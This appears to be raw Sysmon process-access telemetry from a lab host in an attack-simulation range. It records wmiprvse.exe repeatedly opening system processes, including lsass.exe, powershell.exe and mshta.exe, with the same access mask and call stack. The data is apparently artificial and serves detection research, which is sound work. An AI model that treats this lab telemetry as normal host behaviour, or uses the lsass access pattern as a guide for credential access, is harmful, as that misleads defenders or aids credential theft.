15:59:13.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022459Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.757{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022458Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.742{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022457Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.742{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022456Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.742{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022455Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.742{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022454Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.742{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022453Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.742{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022452Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.742{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022451Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.742{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022450Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.742{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022449Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.742{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022448Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.742{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022447Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.742{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022446Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.695{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5350-6008-2106-00000000A301}5664C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022445Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.695{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5350-6008-2006-00000000A301}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022444Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.695{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5350-6008-1F06-00000000A301}5864C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022443Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022442Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022441Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.679{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022440Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 